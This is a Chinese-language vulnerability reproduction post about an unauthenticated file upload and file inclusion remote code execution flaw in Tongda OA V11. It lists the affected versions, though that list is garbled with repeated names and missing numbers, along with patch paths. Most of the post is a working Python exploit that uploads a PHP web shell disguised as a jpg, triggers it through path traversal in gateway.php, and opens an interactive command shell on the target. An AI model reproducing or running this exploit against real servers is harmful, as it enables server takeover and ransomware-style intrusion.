漏洞说明
通达OA是一套办公系统.近日通达OA官方在其官方论坛披露了近期一起通达OA用户服务器遭受勒索病毒攻击事件并发布了多个版本的漏洞补丁.漏洞类型为任意文件上传,受影响的版本存在文件包含漏洞. 未授权的远程攻击者可以通过精心构造的请求包进行文件包含并触发远程代码执行.
OA通达简介
通达OA是由北京通达信科科技有限公司研发的一款通用型OA产品,涵盖了个人事务、行政办公、流程审批、知识管理、人力资源管理、组织机构管理等企业信息化管理功能。,通达云OA入驻阿里云企业应用专区,已为众多中小企业提供了稳定、可靠、强悍的云计算支撑。
影响版本
tongdaOA V11
tangdaOA
tangdaOA
tangdaOA
tangdaOA 增强版
tangdaOA
修复
版本 更新包下载地址
V11版 /oa/security/_A1.11.3.exe
版 /oa/security/_A1.10.19.exe
版 /oa/security/_A1.9.13.exe
版 /oa/security/_A1.8.15.exe
增强版 /oa/security/_A1.7.25.exe
版 /oa/security/_A1.6.20.exe
漏洞复现
通过官网下载OA软装.
在window下执行TDOA11.3默认提示安装
默认用户admin,密码为空
上传文件
文件包含
脚本
#!/usr/bin/env python3# -*- encoding: utf-8 -*-# oa通达文件上传加文件包含远程代码执行import requestsimport reimport sysdef oa(url):upurl = url + '/ispirit/im/upload.php'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['cmd'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"req = requests.post(url=upurl, headers=headers, data=data)filename = "".join(re.findall("_(.+?)\|",req.text))in_url = url + '/ispirit/interface/gateway.php'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}data = "json={\"url\":\"../../../general/../attach/im//%s.jpg\"}&cmd=%s" % (filename,"echo php00py")include_req = requests.post(url=in_url, headers=headers, data=data)if 'php00py' in include_req.text:print("[+] OA RCE vulnerability ")return filenameelse:print("[-] Not OA RCE vulnerability ")return Falsedef oa_rce(url, filename,command):url = url + '/ispirit/interface/gateway.php'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}data = "json={\"url\":\"../../../general/../attach/im//%s.jpg\"}&cmd=%s" % (filename,command)req = requests.post(url, headers=headers, data=data)print(req.text)if __name__ == '__main__':if len(sys.argv) < 2:print("please input your url python oa_rce.py http://127.0.0.1:8181")else:url = sys.argv[1]filename = oa(url)while filename:try:command = input("wran@shelLhost#")if command == "exit" or command == "quit":breakelse:oa_rce(url,filename,command)except KeyboardInterrupt:break
![[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现](https://900zi.500zi.com/uploadfile/img/15/607/14e5df8998aadd2d3caeaa21b010e8cf.jpg)
